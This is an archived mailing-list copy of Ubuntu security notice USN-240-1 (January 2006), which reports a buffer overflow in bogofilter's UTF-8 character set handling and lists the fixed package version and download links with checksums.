for <lists@securityspace.com>; Fri, 13 Jan 2006 02:27:17 -0500 (EST)
Received: from outgoing.securityfocus.com by outgoing.securityfocus.com
via smtpd (for mx.securityspace.com [69.28.227.216]) with ESMTP; Thu, 12 Jan 2006 23:04:14 -0800
Received: from lists2.securityfocus.com (lists2.securityfocus.com [205.206.231.20])
by outgoing2.securityfocus.com (Postfix) with QMQP
id 1C50A144C8E; Wed, 11 Jan 2006 14:00:14 -0700 (MST)
Mailing-List: contact bugtraq-help@securityfocus.com; run by ezmlm
Precedence: bulk
List-Id: <bugtraq.list-id.securityfocus.com>
List-Post: <mailto:bugtraq@securityfocus.com>
List-Help: <mailto:bugtraq-help@securityfocus.com>
List-Unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
List-Subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
Delivered-To: mailing list bugtraq@securityfocus.com
Delivered-To: moderator for bugtraq@securityfocus.com
Received: (qmail 8121 invoked from network); 11 Jan 2006 10:33:05 -0000
Date: Wed, 11 Jan 2006 18:05:47 +0100
From: Martin Pitt <martin.pitt@canonical.com>
To: ubuntu-security-announce@lists.ubuntu.com
Cc: full-disclosure@lists.grok.org.uk, bugtraq@securityfocus.com
Subject: [USN-240-1] bogofilter vulnerability
Message-ID: <20060111170547.GB7125@piware.de>
MIME-Version: 1.0
Content-Type: multipart/signed; micalg=pgp-sha1;
protocol="application/pgp-signature"; boundary="oC1+HKm2/end4ao3"
Content-Disposition: inline
User-Agent: Mutt/1.5.11
Status:
--oC1+HKm2/end4ao3
Content-Type: text/plain; charset=us-ascii
Content-Disposition: inline
==========================================================
Ubuntu Security Notice USN-240-1 January 11, 2006
bogofilter vulnerability
CVE-2005-4591
==========================================================
A security issue affects the following Ubuntu releases:
Ubuntu 5.10 (Breezy Badger)
The following packages are affected:
bogofilter
The problem can be corrected by upgrading the affected package to
version 0.95.2-1ubuntu1.1. In general, a standard system upgrade is
sufficient to effect the necessary changes.
Details follow:
A buffer overflow was found in bogofilter's character set conversion
handling. Certain invalid UTF-8 character sequences caused an invalid
memory access. By sending a specially crafted email, a remote attacker
could exploit this to crash bogofilter or possibly even execute
arbitrary code with bogofilter's privileges.
Source archives:
http://security.ubuntu.com/ubuntu/pool/main/b/bogofilter/bogofilter_0.95.2-1ubuntu1.1.diff.gz
Size/MD5: 10848 a3a01223665479ed500aee9b64d9669a
http://security.ubuntu.com/ubuntu/pool/main/b/bogofilter/bogofilter_0.95.2-1ubuntu1.1.dsc
Size/MD5: 638 bfedbfb65a22f9a482bfa1356a7bd761
http://security.ubuntu.com/ubuntu/pool/main/b/bogofilter/bogofilter_0.95.2.orig.tar.gz
Size/MD5: 866258 bdca7acd8cccff1976ab2ceab075830a
amd64 architecture (Athlon64, Opteron, EM64T Xeon)
http://security.ubuntu.com/ubuntu/pool/main/b/bogofilter/bogofilter-bdb_0.95.2-1ubuntu1.1_amd64.deb
Size/MD5: 291350 8173d4c3d9c06420655d6b50c43c5b44
http://security.ubuntu.com/ubuntu/pool/main/b/bogofilter/bogofilter-common_0.95.2-1ubuntu1.1_amd64.deb
Size/MD5: 136588 f9ce89c4857c0d764100a72e22620a28
http://security.ubuntu.com/ubuntu/pool/main/b/bogofilter/bogofilter_0.95.2-1ubuntu1.1_amd64.deb
Size/MD5: 942 c4583a7d5ed114d1b23bdda9dff0b7db
i386 architecture (x86 compatible Intel/AMD)
http://security.ubuntu.com/ubuntu/pool/main/b/bogofilter/bogofilter-bdb_0.95.2-1ubuntu1.1_i386.deb
Size/MD5: 237316 62e0348f1907d35d2a990a2c69543fb6
http://security.ubuntu.com/ubuntu/pool/main/b/bogofilter/bogofilter-common_0.95.2-1ubuntu1.1_i386.deb
Size/MD5: 136590 acbfe94471e877359dc0e910d9be52eb
http://security.ubuntu.com/ubuntu/pool/main/b/bogofilter/bogofilter_0.95.2-1ubuntu1.1_i386.deb
Size/MD5: 944 58e0b7482f9bc1a885940bfbf5d4c2ff
powerpc architecture (Apple Macintosh G3/G4/G5)
http://security.ubuntu.com/ubuntu/pool/main/b/bogofilter/bogofilter-bdb_0.95.2-1ubuntu1.1_powerpc.deb
Size/MD5: 272064 05edb162837021bbcde1d6a3c7b5f1b4
http://security.ubuntu.com/ubuntu/pool/main/b/bogofilter/bogofilter-common_0.95.2-1ubuntu1.1_powerpc.deb
Size/MD5: 136574 404fc07951bb7e614a55f15f6be9460c
http://security.ubuntu.com/ubuntu/pool/main/b/bogofilter/bogofilter_0.95.2-1ubuntu1.1_powerpc.deb
Size/MD5: 946 a4fefa7122015cad56364bb27e29baeb